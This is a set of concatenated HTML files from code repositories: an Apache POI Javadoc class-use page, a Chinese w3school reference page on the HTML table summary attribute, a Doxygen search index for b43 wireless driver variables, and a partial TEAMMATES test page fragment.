</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../../org/apache/poi/hssf/usermodel/HSSFDataFormat.html" title="class in org.apache.poi.hssf.usermodel">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?org/apache/poi/hssf/usermodel/class-use/HSSFDataFormat.html" target="_top">Frames</a></li>
<li><a href="HSSFDataFormat.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class org.apache.poi.hssf.usermodel.HSSFDataFormat" class="title">Uses of Class<br>org.apache.poi.hssf.usermodel.HSSFDataFormat</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation">
<caption><span>Packages that use <a href="../../../../../../org/apache/poi/hssf/usermodel/HSSFDataFormat.html" title="class in org.apache.poi.hssf.usermodel">HSSFDataFormat</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Package</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="#org.apache.poi.hssf.usermodel">org.apache.poi.hssf.usermodel</a></td>
<td class="colLast">
<div class="block">usermodel package maps HSSF low level strutures to familiar workbook/sheet model
Related Documentation
For overviews, tutorials, examples, guides, and tool documentation, please see:
<a href="http://poi.apache.org">Apache POI Project</a>
</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="org.apache.poi.hssf.usermodel">
<!-- -->
</a>
<h3>Uses of <a href="../../../../../../org/apache/poi/hssf/usermodel/HSSFDataFormat.html" title="class in org.apache.poi.hssf.usermodel">HSSFDataFormat</a> in <a href="../../../../../../org/apache/poi/hssf/usermodel/package-summary.html">org.apache.poi.hssf.usermodel</a></h3>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../../org/apache/poi/hssf/usermodel/package-summary.html">org.apache.poi.hssf.usermodel</a> that return <a href="../../../../../../org/apache/poi/hssf/usermodel/HSSFDataFormat.html" title="class in org.apache.poi.hssf.usermodel">HSSFDataFormat</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../../org/apache/poi/hssf/usermodel/HSSFDataFormat.html" title="class in org.apache.poi.hssf.usermodel">HSSFDataFormat</a></code></td>
<td class="colLast"><span class="strong">HSSFWorkbook.</span><code><strong><a href="../../../../../../org/apache/poi/hssf/usermodel/HSSFWorkbook.html#createDataFormat()">createDataFormat</a></strong>()</code>
<div class="block">Returns the instance of HSSFDataFormat for this workbook.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../../../../org/apache/poi/hssf/usermodel/HSSFDataFormat.html" title="class in org.apache.poi.hssf.usermodel">HSSFDataFormat</a></code></td>
<td class="colLast"><span class="strong">HSSFCreationHelper.</span><code><strong><a href="../../../../../../org/apache/poi/hssf/usermodel/HSSFCreationHelper.html#createDataFormat()">createDataFormat</a></strong>()</code> </td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../../org/apache/poi/hssf/usermodel/HSSFDataFormat.html" title="class in org.apache.poi.hssf.usermodel">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?org/apache/poi/hssf/usermodel/class-use/HSSFDataFormat.html" target="_top">Frames</a></li>
<li><a href="HSSFDataFormat.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>
<i>Copyright 2014 The Apache Software Foundation or
its licensors, as applicable.</i>
</small></p>
</body>
</html>
|
Coding/W3School/W3CN/www.w3school.com.cn/tags/att_table_summary.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="zh-cn">
<!-- Mirrored from www.w3school.com.cn/tags/att_table_summary.asp by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 04:14:36 GMT -->
<head>
<meta charset="utf-8" />
<meta name="robots" content="all" />
<meta name="author" content="w3school.com.cn" />
<link rel="stylesheet" type="text/css" href="../c5.css" />
<title>HTML <table> 标签的 summary 属性</title>
</head>
<body class="html" id="tags">
<div id="wrapper">
<div id="header">
<a href="../index-2.html" title="w3school 在线教程" style="float:left;">w3school 在线教程</a>
<div id="ad_head">
<script type="text/javascript"><!--
google_ad_client = "pub-3381531532877742";
/* 728x90, 创建于 08-12-1 */
google_ad_slot = "7423315034";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="../../pagead2.googlesyndication.com/pagead/f.txt">
</script>
</div>
</div>
<div id="navfirst">
<ul id="menu">
<li id="h"><a href="../h.html" title="HTML 系列教程">HTML 系列教程</a></li>
<li id="b"><a href="../b.html" title="浏览器脚本教程">浏览器脚本</a></li>
<li id="s"><a href="../s.html" title="服务器脚本教程">服务器脚本</a></li>
<li id="d"><a href="../d.html" title="ASP.NET 教程">ASP.NET 教程</a></li>
<li id="x"><a href="../x.html" title="XML 系列教程">XML 系列教程</a></li>
<li id="ws"><a href="../ws.html" title="Web Services 系列教程">Web Services 系列教程</a></li>
<li id="w"><a href="../w.html" title="建站手册">建站手册</a></li>
</ul>
</div>
<div id="navsecond">
<div id="course"><h2>参考手册</h2>
<ul>
<li><a href="index.html" title="HTML 4.01 / XHTML 1.0 参考手册">标签列表(字母排序)</a></li>
<li><a href="html_ref_byfunc.asp" title="HTML 4.01 / XHTML 1.0 参考手册">标签列表(功能排序)</a></li>
<li><a href="html_ref_standardattributes.html" title="HTML 标准属性">HTML 属性</a></li>
<li><a href="html_ref_eventattributes.html" title="HTML 事件属性">HTML 事件</a></li>
<li><a href="html_ref_audio_video_dom.html" title="HTML Audio/Video DOM 属性">HTML 视频/音频</a></li>
<li><a href="html_ref_canvas.html" title="HTML Canvas 参考手册">HTML 画布</a></li>
<li><a href="html_ref_dtd.asp" title="HTML 元素和有效的 DTD">HTML 文档类型</a></li>
<li><a href="html_ref_colornames.html" title="HTML 颜色名">HTML 颜色名</a></li>
<li><a href="html_ref_charactersets.html" title="HTML 字符集">HTML 字符集</a></li>
<li><a href="html_ref_ascii.html" title="HTML 7 比特 ASCII 代码 参考手册">HTML ASCII</a></li>
<li><a href="html_ref_entities.html" title="HTML ISO-8859-1 参考手册">HTML ISO-8859-1</a></li>
<li><a href="html_ref_symbols.html" title="HTML 符号实体">HTML 符号</a></li>
<li><a href="html_ref_urlencode.html" title="HTML URL 编码">HTML URL 编码</a></li>
<li><a href="html_ref_language_codes.html" title="HTML 语言代码参考手册">HTML 语言代码</a></li>
<li><a href="html_ref_httpmessages.html" title="HTTP 状态消息">HTTP 消息</a></li>
<li><a href="html_ref_httpmethods.html" title="HTTP 方法:GET 对比 POST">HTTP 方法</a></li>
</ul>
<h2>HTML 标签</h2>
<ul>
<li><a href="tag_comment.html" title="HTML <!--> 标签"><!--></a></li>
<li><a href="tag_doctype.html" title="HTML <!DOCTYPE> 标签"><!DOCTYPE></a></li>
<li><a href="tag_a.asp" title="HTML <a> 标签"><a></a></li>
<li><a href="tag_abbr.html" title="HTML <abbr> 标签"><abbr></a></li>
<li><a href="tag_acronym.asp" title="HTML <acronym> 标签"><acronym></a></li>
<li><a href="tag_address.html" title="HTML <address> 标签"><address></a></li>
<li><a href="tag_applet.html" title="HTML <applet> 标签"><applet></a></li>
<li><a href="tag_area.html" title="HTML <area> 标签"><area></a></li>
<li><a href="tag_article.html" title="HTML <article> 标签"><article></a></li>
<li><a href="tag_aside.html" title="HTML <aside> 标签"><aside></a></li>
<li><a href="tag_audio.html" title="HTML <audio> 标签"><audio></a></li>
<li><a href="tag_b.html" title="HTML <b> 标签"><b></a></li>
<li><a href="tag_base.html" title="HTML <base> 标签"><base></a></li>
<li><a href="tag_basefont.html" title="HTML <basefont> 标签"><basefont></a></li>
<li><a href="tag_bdi.html" title="HTML <bdi> 标签"><bdi></a></li>
<li><a href="tag_bdo.html" title="HTML <bdo> 标签"><bdo></a></li>
<li><a href="tag_big.html" title="HTML <big> 标签"><big></a></li>
<li><a href="tag_blockquote.html" title="HTML <blockquote> 标签"><blockquote></a></li>
<li><a href="tag_body.html" title="HTML <body> 标签"><body></a></li>
<li><a href="tag_br.html" title="HTML <br> 标签"><br></a></li>
<li><a href="tag_button.html" title="HTML <button> 标签"><button></a></li>
<li><a href="tag_canvas.html" title="HTML <canvas> 标签"><canvas></a></li>
<li><a href="tag_caption.html" title="HTML <caption> 标签"><caption></a></li>
<li><a href="tag_center.asp" title="HTML <center> 标签"><center></a></li>
<li><a href="tag_cite.html" title="HTML <cite> 标签"><cite></a></li>
<li><a href="tag_phrase_elements.html" title="HTML <code> 标签"><code></a></li>
<li><a href="tag_col.html" title="HTML <col> 标签"><col></a></li>
<li><a href="tag_colgroup.html" title="HTML <colgroup> 标签"><colgroup></a></li>
<li><a href="tag_command.html" title="HTML <command> 标签"><command></a></li>
<li><a href="tag_datalist.html" title="HTML <datalist> 标签"><datalist></a></li>
<li><a href="tag_dd.html" title="HTML <dd> 标签"><dd></a></li>
<li><a href="tag_del.html" title="HTML <del> 标签"><del></a></li>
<li><a href="tag_details.asp" title="HTML <details> 标签"><details></a></li>
<li><a href="tag_phrase_elements.html" title="HTML <dfn> 标签"><dfn></a></li>
<li><a href="tag_dialog.html" title="HTML <dialog> 标签"><dialog></a></li>
<li><a href="tag_dir.html" title="HTML <dir> 标签"><dir></a></li>
<li><a href="tag_div.html" title="HTML <div> 标签"><div></a></li>
<li><a href="tag_dl.html" title="HTML <dl> 标签"><dl></a></li>
<li><a href="tag_dt.html" title="HTML <dt> 标签"><dt></a></li>
<li><a href="tag_phrase_elements.html" title="HTML <em> 标签"><em></a></li>
<li><a href="tag_embed.asp" title="HTML <embed> 标签"><embed></a></li>
<li><a href="tag_fieldset.html" title="HTML <fieldset> 标签"><fieldset></a></li>
<li><a href="tag_figcaption.html" title="HTML <figcaption> 标签"><figcaption></a></li>
<li><a href="tag_figure.html" title="HTML <figure> 标签"><figure></a></li>
<li><a href="tag_font.html" title="HTML <font> 标签"><font></a></li>
<li><a href="tag_footer.html" title="HTML <footer> 标签"><footer></a></li>
<li><a href="tag_form.html" title="HTML <form> 标签"><form></a></li>
<li><a href="tag_frame.asp" title="HTML <frame> 标签"><frame></a></li>
<li><a href="tag_frameset.html" title="HTML <frameset> 标签"><frameset></a></li>
<li><a href="tag_hn.html" title="HTML <h1> - <h6> 标签"><h1> - <h6></a></li>
<li><a href="tag_head.html" title="HTML <head> 标签"><head></a></li>
<li><a href="tag_header.html" title="HTML <header> 标签"><header></a></li>
<li><a href="tag_hr.asp" title="HTML <hr> 标签"><hr></a></li>
<li><a href="tag_html.html" title="HTML <html> 标签"><html></a></li>
<li><a href="tag_i.html" title="HTML <i> 标签"><i></a></li>
<li><a href="tag_iframe.html" title="HTML <iframe> 标签"><iframe></a></li>
<li><a href="tag_img.html" title="HTML <img> 标签"><img></a></li>
<li><a href="tag_input.html" title="HTML <input> 标签"><input></a></li>
<li><a href="tag_ins.html" title="HTML <ins> 标签"><ins></a></li>
<li><a href="tag_phrase_elements.html" title="HTML <kbd> 标签"><kbd></a></li>
<li><a href="tag_keygen.html" title="HTML <keygen> 标签"><keygen></a></li>
<li><a href="tag_label.html" title="HTML <label> 标签"><label></a></li>
<li><a href="tag_legend.html" title="HTML <legend> 标签"><legend></a></li>
<li><a href="tag_li.asp" title="HTML <li> 标签"><li></a></li>
<li><a href="tag_link.html" title="HTML <link> 标签"><link></a></li>
<li><a href="tag_main.html" title="HTML <main> 标签"><main></a></li>
<li><a href="tag_map.html" title="HTML <map> 标签"><map></a></li>
<li><a href="tag_mark.html" title="HTML <mark> 标签"><mark></a></li>
<li><a href="tag_menu.html" title="HTML <menu> 标签"><menu></a></li>
<li><a href="tag_menuitem.html" title="HTML <menuitem> 标签"><menuitem></a></li>
<li><a href="tag_meta.html" title="HTML <meta> 标签"><meta></a></li>
<li><a href="tag_meter.html" title="HTML <meter> 标签"><meter></a></li>
<li><a href="tag_nav.html" title="HTML <nav> 标签"><nav></a></li>
<li><a href="tag_noframes.html" title="HTML <noframes> 标签"><noframes></a></li>
<li><a href="tag_noscript.html" title="HTML <noscript> 标签"><noscript></a></li>
<li><a href="tag_object.html" title="HTML <object> 标签"><object></a></li>
<li><a href="tag_ol.html" title="HTML <ol> 标签"><ol></a></li>
<li><a href="tag_optgroup.html" title="HTML <optgroup> 标签"><optgroup></a></li>
<li><a href="tag_option.html" title="HTML <option> 标签"><option></a></li>
<li><a href="tag_output.html" title="HTML <output> 标签"><output></a></li>
<li><a href="tag_p.html" title="HTML <p> 标签"><p></a></li>
<li><a href="tag_param.html" title="HTML <param> 标签"><param></a></li>
<li><a href="tag_pre.asp" title="HTML <pre> 标签"><pre></a></li>
<li><a href="tag_progress.html" title="HTML <progress> 标签"><progress></a></li>
<li><a href="tag_q.html" title="HTML <q> 标签"><q></a></li>
<li><a href="tag_rp.html" title="HTML <rp> 标签"><rp></a></li>
<li><a href="tag_rt.html" title="HTML <rt> 标签"><rt></a></li>
<li><a href="tag_ruby.html" title="HTML <ruby> 标签"><ruby></a></li>
<li><a href="tag_s.html" title="HTML <s> 标签"><s></a></li>
<li><a href="tag_phrase_elements.html" title="HTML <samp> 标签"><samp></a></li>
<li><a href="tag_script.html" title="HTML <script> 标签"><script></a></li>
<li><a href="tag_section.html" title="HTML <section> 标签"><section></a></li>
<li><a href="tag_select.html" title="HTML <select> 标签"><select></a></li>
<li><a href="tag_small.html" title="HTML <small> 标签"><small></a></li>
<li><a href="tag_source.html" title="HTML <source> 标签"><source></a></li>
<li><a href="tag_span.html" title="HTML <span> 标签"><span></a></li>
<li><a href="tag_strike.html" title="HTML <strike> 标签"><strike></a></li>
<li><a href="tag_phrase_elements.html" title="HTML <strong> 标签"><strong></a></li>
<li><a href="tag_style.html" title="HTML <style> 标签"><style></a></li>
<li><a href="tag_sub.html" title="HTML <sub> 标签"><sub></a></li>
<li><a href="tag_summary.asp" title="HTML <summary> 标签"><summary></a></li>
<li><a href="tag_sup.html" title="HTML <sup> 标签"><sup></a></li>
<li><a href="tag_table.html" title="HTML <table> 标签"><table></a></li>
<li><a href="tag_tbody.html" title="HTML <tbody> 标签"><tbody></a></li>
<li><a href="tag_td.html" title="HTML <td> 标签"><td></a></li>
<li><a href="tag_textarea.html" title="HTML <textarea> 标签"><textarea></a></li>
<li><a href="tag_tfoot.html" title="HTML <tfoot> 标签"><tfoot></a></li>
<li><a href="tag_th.html" title="HTML <th> 标签"><th></a></li>
<li><a href="tag_thead.html" title="HTML <thead> 标签"><thead></a></li>
<li><a href="tag_time.html" title="HTML <time> 标签"><time></a></li>
<li><a href="tag_title.html" title="HTML <title> 标签"><title></a></li>
<li><a href="tag_tr.html" title="HTML <tr> 标签"><tr></a></li>
<li><a href="tag_track.html" title="HTML <track> 标签"><track></a></li>
<li><a href="tag_tt.html" title="HTML <tt> 标签"><tt></a></li>
<li><a href="tag_u.html" title="HTML <u> 标签"><u></a></li>
<li><a href="tag_ul.html" title="HTML <ul> 标签"><ul></a></li>
<li><a href="tag_phrase_elements.html" title="HTML <var> 标签"><var></a></li>
<li><a href="tag_video.html" title="HTML <video> 标签"><video></a></li>
<li><a href="tag_wbr.html" title="HTML <wbr> 标签"><wbr></a></li>
</ul>
</div><div id="selected">
<h2>建站手册</h2>
<ul>
<li><a href="../site/index.html" title="网站构建">网站构建</a></li>
<li><a href="../w3c/index.html" title="万维网联盟 (W3C)">万维网联盟 (W3C)</a></li>
<li><a href="../browsers/index.html" title="浏览器信息">浏览器信息</a></li>
<li><a href="../quality/index.html" title="网站品质">网站品质</a></li>
<li><a href="../semweb/index.html" title="语义网">语义网</a></li>
<li><a href="../careers/index.asp" title="职业规划">职业规划</a></li>
<li><a href="../hosting/index.html" title="网站主机">网站主机</a></li>
</ul>
<h2><a href="../about/index.html" title="关于 W3School" id="link_about">关于 W3School</a></h2>
<h2><a href="../about/about_helping.html" title="帮助 W3School" id="link_help">帮助 W3School</a></h2>
</div>
</div>
<div id="maincontent">
<h1>HTML <table> 标签的 summary 属性</h1>
<div class="backtoreference">
<p><a href="tag_table.html">HTML <table> 标签</a></p>
</div>
<div>
<h2>实例</h2>
<p>下面的例子定义了表格内容的摘要:</p>
<pre>
<table border="1" <code>summary="Monthly savings for the Flintstones family"</code>>
<tr>
<th>Month</th>
<th>Savings</th>
</tr>
<tr>
<td>January</td>
<td>$100</td>
</tr>
</table>
</pre>
<p class="tiy"><a target="_blank" href="../tiy/te447.html?f=html_table_summary">亲自试一试</a></p>
</div>
<div>
<h2>定义和用法</h2>
<p>summary 属性规定表格内容的摘要。</p>
<p>summary 属性不会对普通浏览器中产生任何视觉变化。</p>
<p>屏幕阅读器可以利用该属性。</p>
</div>
<div>
<h2>浏览器支持</h2>
<p>由于不会在普通浏览器中产生任何视觉效果,很难判断浏览器是否支持 summary 属性。</p>
</div>
<div>
<h2>语法</h2>
<pre><body summary="<i>value</i>"></pre>
<h3>属性值</h3>
<table class="dataintable">
<tr>
<th>值</th>
<th>描述</th>
</tr>
<tr>
<td><i>text</i></td>
<td>表格内容的摘要。</td>
</tr>
</table>
</div>
<div class="backtoreference">
<p><a href="tag_table.html">HTML <table> 标签</a></p>
</div>
</div>
<!-- maincontent end -->
<div id="sidebar">
<div id="searchui">
<form method="get" id="searchform" action="http://www.google.com.hk/search">
<p><label for="searched_content">Search:</label></p>
<p><input type="hidden" name="sitesearch" value="w3school.com.cn" /></p>
<p>
<input type="text" name="as_q" class="box" id="searched_content" title="在此输入搜索内容。" />
<input type="submit" value="Go" class="button" title="搜索!" />
</p>
</form>
</div>
<div id="tools">
<h5 id="tools_reference"><a href="index.html">HTML 参考手册</a></h5>
<h5 id="tools_example"><a href="../example/html_examples.html">HTML 实例</a></h5>
<h5 id="tools_quiz"><a href="../html/html_quiz.html">HTML 测验</a></h5>
</div>
<div id="ad">
<script type="text/javascript"><!--
google_ad_client = "ca-pub-3381531532877742";
/* sidebar-160x600 */
google_ad_slot = "3772569310";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>
<script type="text/javascript"
src="../../pagead2.googlesyndication.com/pagead/f.txt">
</script>
</div>
</div>
<div id="footer">
<p>
W3School 提供的内容仅用于培训。我们不保证内容的正确性。通过使用本站内容随之而来的风险与本站无关。W3School 简体中文版的所有内容仅供测试,对任何法律问题及风险不承担任何责任。
</p>
<p>
当使用本站时,代表您已接受了本站的<a href="../about/about_use.html" title="关于使用">使用条款</a>和<a href="../about/about_privacy.html" title="关于隐私">隐私条款</a>。版权所有,保留一切权利。
赞助商:<a href="http://www.yktz.net/" title="上海赢科投资有限公司">上海赢科投资有限公司</a>。
<a href="http://www.miitbeian.gov.cn/">蒙ICP备06004630号</a>
</p>
</div>
</div>
<!-- wrapper end -->
</body>
<!-- Mirrored from www.w3school.com.cn/tags/att_table_summary.asp by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 04:14:37 GMT -->
</html> |
DocumentationDOXY/html/search/variables_67.html | abdo5520/-FINS-compat-wireless-3.2.5 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title></title>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<link rel="stylesheet" type="text/css" href="search.css"/>
<script type="text/javascript" src="search.js"></script>
</head>
<body class="SRPage">
<div id="SRIndex">
<div class="SRStatus" id="Loading">Loading...</div>
<div class="SRResult" id="SR_g">
<div class="SREntry">
<a id="Item0" onkeydown="return searchResults.Nav(event,0)" onkeypress="return searchResults.Nav(event,0)" onkeyup="return searchResults.Nav(event,0)" class="SRSymbol" href="../structb43__phy.html#a1e9825add342ac2d7fd3890fe8244d3d" target="_parent">g</a>
<span class="SRScope">b43_phy</span>
</div>
</div>
<div class="SRResult" id="SR_g_5fenv">
<div class="SREntry">
<a id="Item1" onkeydown="return searchResults.Nav(event,1)" onkeypress="return searchResults.Nav(event,1)" onkeyup="return searchResults.Nav(event,1)" class="SRSymbol" href="../structnphy__txiqcal__ladder.html#a801ec4d2077c205135d020793bb2fb7d" target="_parent">g_env</a>
<span class="SRScope">nphy_txiqcal_ladder</span>
</div>
</div>
<div class="SRResult" id="SR_gain_5fbits">
<div class="SREntry">
<a id="Item2" onkeydown="return searchResults.Nav(event,2)" onkeypress="return searchResults.Nav(event,2)" onkeyup="return searchResults.Nav(event,2)" class="SRSymbol" href="../structnphy__gain__ctl__workaround__entry.html#ad8c7e571638a03c8aa75ab6e29ec1111" target="_parent">gain_bits</a>
<span class="SRScope">nphy_gain_ctl_workaround_entry</span>
</div>
</div>
<div class="SRResult" id="SR_gain_5fboost">
<div class="SREntry">
<a id="Item3" onkeydown="return searchResults.Nav(event,3)" onkeypress="return searchResults.Nav(event,3)" onkeyup="return searchResults.Nav(event,3)" class="SRSymbol" href="../structb43__phy__n.html#aad6f3e9be30a5f527804da2d4d0415a5" target="_parent">gain_boost</a>
<span class="SRScope">b43_phy_n</span>
</div>
</div>
<div class="SRResult" id="SR_gain_5fdb">
<div class="SREntry">
<a id="Item4" onkeydown="return searchResults.Nav(event,4)" onkeypress="return searchResults.Nav(event,4)" onkeyup="return searchResults.Nav(event,4)" class="SRSymbol" href="../structnphy__gain__ctl__workaround__entry.html#ab2878c9e716d3b642d68b153f717f05c" target="_parent">gain_db</a>
<span class="SRScope">nphy_gain_ctl_workaround_entry</span>
</div>
</div>
<div class="SRResult" id="SR_gband_5fspurwar_5fen">
<div class="SREntry">
<a id="Item5" onkeydown="return searchResults.Nav(event,5)" onkeypress="return searchResults.Nav(event,5)" onkeyup="return searchResults.Nav(event,5)" class="SRSymbol" href="../structb43__phy__n.html#a0b6d681eba10557660e59cc1dbe5a506" target="_parent">gband_spurwar_en</a>
<span class="SRScope">b43_phy_n</span>
</div>
</div>
<div class="SRResult" id="SR_get_5fcurrent_5frxslot">
<div class="SREntry">
<a id="Item6" onkeydown="return searchResults.Nav(event,6)" onkeypress="return searchResults.Nav(event,6)" onkeyup="return searchResults.Nav(event,6)" class="SRSymbol" href="../structb43__dma__ops.html#ada696b335b164887308900f104d84123" target="_parent">get_current_rxslot</a>
<span class="SRScope">b43_dma_ops</span>
</div>
</div>
<div class="SRResult" id="SR_get_5fdefault_5fchan">
<div class="SREntry">
<a id="Item7" onkeydown="return searchResults.Nav(event,7)" onkeypress="return searchResults.Nav(event,7)" onkeyup="return searchResults.Nav(event,7)" class="SRSymbol" href="../structb43__phy__operations.html#af9bf251571e08b2c7306a2b48f86a389" target="_parent">get_default_chan</a>
<span class="SRScope">b43_phy_operations</span>
</div>
</div>
<div class="SRResult" id="SR_ghz2">
<div class="SREntry">
<a id="Item8" onkeydown="return searchResults.Nav(event,8)" onkeypress="return searchResults.Nav(event,8)" onkeyup="return searchResults.Nav(event,8)" class="SRSymbol" href="javascript:searchResults.Toggle('SR_ghz2')">ghz2</a>
<div class="SRChildren">
<a id="Item8_c0" onkeydown="return searchResults.NavChild(event,8,0)" onkeypress="return searchResults.NavChild(event,8,0)" onkeyup="return searchResults.NavChild(event,8,0)" class="SRScope" href="../structb2055__inittab__entry.html#a4bafe13cf7ce60aa7fd116139111be7e" target="_parent">b2055_inittab_entry::ghz2()</a>
<a id="Item8_c1" onkeydown="return searchResults.NavChild(event,8,1)" onkeypress="return searchResults.NavChild(event,8,1)" onkeyup="return searchResults.NavChild(event,8,1)" class="SRScope" href="../structb2056__inittab__entry.html#ae43ce78063140fbc267576f055ece126" target="_parent">b2056_inittab_entry::ghz2()</a>
</div>
</div>
</div>
<div class="SRResult" id="SR_ghz5">
<div class="SREntry">
<a id="Item9" onkeydown="return searchResults.Nav(event,9)" onkeypress="return searchResults.Nav(event,9)" onkeyup="return searchResults.Nav(event,9)" class="SRSymbol" href="javascript:searchResults.Toggle('SR_ghz5')">ghz5</a>
<div class="SRChildren">
<a id="Item9_c0" onkeydown="return searchResults.NavChild(event,9,0)" onkeypress="return searchResults.NavChild(event,9,0)" onkeyup="return searchResults.NavChild(event,9,0)" class="SRScope" href="../structb2055__inittab__entry.html#a79562957dd6095290f09ba9a4d6ba604" target="_parent">b2055_inittab_entry::ghz5()</a>
<a id="Item9_c1" onkeydown="return searchResults.NavChild(event,9,1)" onkeypress="return searchResults.NavChild(event,9,1)" onkeyup="return searchResults.NavChild(event,9,1)" class="SRScope" href="../structb2056__inittab__entry.html#ade78d266f55e6fd16ce92b42a33a65b7" target="_parent">b2056_inittab_entry::ghz5()</a>
</div>
</div>
</div>
<div class="SRResult" id="SR_gm">
<div class="SREntry">
<a id="Item10" onkeydown="return searchResults.Nav(event,10)" onkeypress="return searchResults.Nav(event,10)" onkeyup="return searchResults.Nav(event,10)" class="SRSymbol" href="javascript:searchResults.Toggle('SR_gm')">gm</a>
<div class="SRChildren">
<a id="Item10_c0" onkeydown="return searchResults.NavChild(event,10,0)" onkeypress="return searchResults.NavChild(event,10,0)" onkeyup="return searchResults.NavChild(event,10,0)" class="SRScope" href="../structlpphy__tx__gains.html#acf42adc6b651e4d05f7538ccddd7d4de" target="_parent">lpphy_tx_gains::gm()</a>
<a id="Item10_c1" onkeydown="return searchResults.NavChild(event,10,1)" onkeypress="return searchResults.NavChild(event,10,1)" onkeyup="return searchResults.NavChild(event,10,1)" class="SRScope" href="../structlpphy__tx__gain__table__entry.html#ae87b235f8b6fd6de5d8a32056e66f3d5" target="_parent">lpphy_tx_gain_table_entry::gm()</a>
<a id="Item10_c2" onkeydown="return searchResults.NavChild(event,10,2)" onkeypress="return searchResults.NavChild(event,10,2)" onkeyup="return searchResults.NavChild(event,10,2)" class="SRScope" href="../structb43__lcntab__tx__gain__tbl__entry.html#ad7973fd26e34a7123c8237b74eacac2c" target="_parent">b43_lcntab_tx_gain_tbl_entry::gm()</a>
</div>
</div>
</div>
<div class="SRResult" id="SR_gm_5fgain">
<div class="SREntry">
<a id="Item11" onkeydown="return searchResults.Nav(event,11)" onkeypress="return searchResults.Nav(event,11)" onkeyup="return searchResults.Nav(event,11)" class="SRSymbol" href="../structlcn__tx__gains.html#ac50e6720d8d8978101e79a19333e0b49" target="_parent">gm_gain</a>
<span class="SRScope">lcn_tx_gains</span>
</div>
</div>
<div class="SRResult" id="SR_gmode">
<div class="SREntry">
<a id="Item12" onkeydown="return searchResults.Nav(event,12)" onkeypress="return searchResults.Nav(event,12)" onkeyup="return searchResults.Nav(event,12)" class="SRSymbol" href="../structb43__phy.html#a425b0dbe6f1e5a44b92676f5d66387a8" target="_parent">gmode</a>
<span class="SRScope">b43_phy</span>
</div>
</div>
<div class="SRStatus" id="Searching">Searching...</div>
<div class="SRStatus" id="NoMatches">No Matches</div>
<script type="text/javascript"><!--
document.getElementById("Loading").style.display="none";
document.getElementById("NoMatches").style.display="none";
var searchResults = new SearchResults("searchResults");
searchResults.Search();
--></script>
</div>
</body>
</html>
|
src/test/resources/pages/newlyJoinedInstructorFeedbackResultsPage.html | sujeet14108/teammates | <div class="container" id="mainContent">
<div id="topOfPage">
</div>
<h1>
Session Results
</h1>
<br>
<div class="well well-plain padding-0">
<div class="form-horizontal">
<div class="panel-heading">
<div class="row">
<div class="col-sm-5 col-lg-4">
<div class="form-group">
<label class="col-lg-4 control-label">
Course ID:
</label>
<div class="col-lg-8">
<p class="form-control-static">
AHPUiT____.instr1_.gma-demo
</p>
</div>
</div>
<div class="form-group">
<label class="col-lg-4 control-label">
Session:
</label>
<div class="col-lg-8">
<p class="form-control-static">
Second team feedback session
